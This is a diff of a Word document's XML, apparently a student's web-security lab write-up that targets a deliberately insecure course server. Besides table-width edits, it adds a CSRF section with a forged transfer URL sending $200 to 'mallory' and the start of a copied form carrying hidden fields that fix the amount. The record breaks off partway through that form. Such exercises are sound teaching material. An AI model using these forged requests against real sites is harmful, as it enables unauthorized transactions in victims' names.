--- a/CS-3710_Bloomfield/tkj9ep-websecurity.docx
+++ b/CS-3710_Bloomfield/tkj9ep-websecurity.docx
@@ -3379,13 +3379,13 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="5935"/>
-        <w:gridCol w:w="3415"/>
+        <w:gridCol w:w="5485"/>
+        <w:gridCol w:w="3865"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3413,7 +3413,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3443,7 +3443,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3466,7 +3466,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3492,7 +3492,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3551,7 +3551,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3577,7 +3577,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3600,7 +3600,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3626,7 +3626,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3685,7 +3685,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3711,7 +3711,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3770,7 +3770,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3796,7 +3796,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3837,7 +3837,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3863,7 +3863,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3886,7 +3886,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3912,7 +3912,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3935,33 +3935,25 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="NoSpacing"/>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>This page served at Sun, 26 Mar 2023 15:28:28 -0400</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+            <w:tcW w:w="3865" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="NoSpacing"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">This page served at Sun, 26 Mar 2023 15:28:28 -0400 </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3972,7 +3964,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3991,16 +3983,7 @@
                   <w:sz w:val="16"/>
                   <w:szCs w:val="16"/>
                 </w:rPr>
-                <w:t>https://andromeda.cs.virginia.edu/~insecure/xss.php</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                  <w:sz w:val="16"/>
-                  <w:szCs w:val="16"/>
-                </w:rPr>
-                <w:t>?name=</w:t>
+                <w:t>https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
               </w:r>
             </w:hyperlink>
           </w:p>
@@ -4025,7 +4008,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4054,7 +4037,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4098,7 +4081,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4127,7 +4110,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4189,7 +4172,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4218,7 +4201,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4280,7 +4263,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4309,7 +4292,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4370,7 +4353,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4399,7 +4382,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4443,7 +4426,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4472,7 +4455,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4533,7 +4516,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4562,7 +4545,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4585,7 +4568,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4614,7 +4597,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4676,7 +4659,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4705,7 +4688,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4767,7 +4750,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4796,7 +4779,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4819,7 +4802,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4848,7 +4831,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5935" w:type="dxa"/>
+            <w:tcW w:w="5485" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4871,7 +4854,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3415" w:type="dxa"/>
+            <w:tcW w:w="3865" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4923,11 +4906,1096 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>CSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Site 1:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://andromeda.cs.virginia.edu/~insecure/csrf.php?amount=200&amp;to=mallory</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;form action="https://andromeda.cs.virginia.edu/~insecure/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>csrf.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>" name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>" method="post"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;p&gt;Transfer </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;select name="amount"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="0" selected="selected"&gt;$0&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="20"&gt;$20&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="40"&gt;$40&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="60"&gt;$60&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="80"&gt;$80&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="100"&gt;$100&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/select&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    to</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;select name="to"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value="" selected="selected"&gt;----- select one -----&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;option value="egoists"&gt;Egoists Anonymous&lt;/option&gt;&lt;option value="redundancy"&gt;The Society for Redundancy Society&lt;/option&gt;&lt;option value="yacht"&gt;The Help Me Fix My Yacht Kickstarter&lt;/option&gt;&lt;option value="vagueness"&gt;Vagueness or Something Association&lt;/option&gt;&lt;option value="apostrophe"&gt;Misplaced Apostrophe's Anonymous&lt;/option&gt;&lt;option value="mediocrity"&gt;International Mediocrity Foundation&lt;/option&gt;&lt;option value="utopia"&gt;Utopians For A Better Society&lt;/option&gt;&lt;option value="fame"&gt;Fame Seekers Anonymous&lt;/option&gt;&lt;option value="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>codep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>"&gt;Codependency Cooperative&lt;/option&gt;&lt;option value="moon"&gt;The Flat Moon Society&lt;/option&gt;    &lt;/select&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;/p&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>&lt;input type="hidden" name="amount" value="200"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
